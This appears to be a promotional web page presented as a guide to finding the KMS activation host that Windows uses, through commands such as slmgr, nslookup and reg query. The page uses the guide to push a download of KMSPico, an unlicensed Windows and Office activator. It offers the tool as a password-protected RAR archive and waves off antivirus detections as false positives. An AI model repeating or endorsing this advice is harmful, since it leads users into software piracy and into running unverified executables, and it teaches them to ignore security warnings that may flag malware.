Last updated: July 31, 2026
Windows records its KMS host in three places - the licensing service, DNS and the registry. This guide shows how to read all three, how to tell a safe local host from a random third-party server, and what to do if you don't like what you find.
Run all three checks - they answer different questions:
> slmgr /dlv > nslookup -type=srv _vlmcs._tcp > reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform" /v KeyManagementServiceName
slmgr /dlv shows the host actually registered with the licensing service. nslookup shows what DNS auto-discovery would hand out. The registry value shows a host that was pinned manually with slmgr /skms.
In the /dlv dialog, scroll to the bottom section. Registered KMS machine name is the live answer - the host your activation renews against every 180 days. You will also see the KMS port (default TCP 1688) and the activation interval. If the line says the machine is using a KMS host at all, your edition is a volume (GVLK-based) edition; retail and OEM activations show no KMS section at all, which is normal for Home licenses activated with a product key.
When no host is pinned manually, Windows asks DNS for _vlmcs._tcp service records and activates against whatever answers. That makes the SRV check important on any network you don't fully control: if a coffee-shop, campus or ISP DNS server publishes a _vlmcs record, your PC may silently activate against a stranger's server. On a healthy home or corporate network the query either returns your organization's host or nothing at all.
A KMS host can see every client that checks in - machine name, product, activation timestamps. If your registered host is an unknown public server, an outside party is not only logging that metadata, they also control whether your renewals succeed; if their server disappears, your activation starts counting down 180 days and eventually lapses. The fix is simple: point Windows at a host you control. A local KMS host - the kind KMSPico sets up on your own machine - removes the dependency entirely: nothing to reach over the network, no third party in the loop, renewals that cannot be blocked by firewalls or DNS changes.
If reading registry values and SRV records feels like more archaeology than you signed up for, the one-click route is easier: KMSPico detects the current licensing state, clears any third-party host configuration and activates Windows (and Office, in the same run) against its own local KMS emulator. Antivirus engines flag KMS utilities generically - an expected false positive for the category - and the build on this site is verified clean before release.
KMSPico clears third-party host settings and activates Windows + Office against a local KMS host on your own PC - one click, automatic 180-day renewals.
Download KMSPico FreeEvent Viewer keeps a paper trail. Under Applications and Services Logs, look for Key Management Service events: activation requests, renewals and failures are all logged with the host they talked to, which is invaluable when slmgr /dlv and reality seem to disagree.
Office keeps its own KMS configuration, separate from Windows. The equivalent check is cscript ospp.vbs /dstatus from the Office16 folder - the KMS machine name line there can legitimately differ from the Windows host, so check both before drawing conclusions.
On domain networks, Group Policy can pin a KMS host that overrides whatever was set locally. If your manual /skms change keeps reverting, gpresult /h report.html will show whether a policy is reapplying it - a common surprise on ex-corporate laptops.
A quick connectivity test completes the picture: Test-NetConnection your-kms-host -Port 1688 in PowerShell tells you whether the host you found is actually reachable. An unreachable registered host explains most pending-expiration surprises.
None of these checks change anything on the system - they are pure inspection. You can run all of them, screenshots included, before deciding whether to keep the current host, switch to another, or hand the whole configuration to a one-click tool.
Download the verified release and start activating Windows or Office in seconds.
Archive password: 123456
Download KMSPico RAR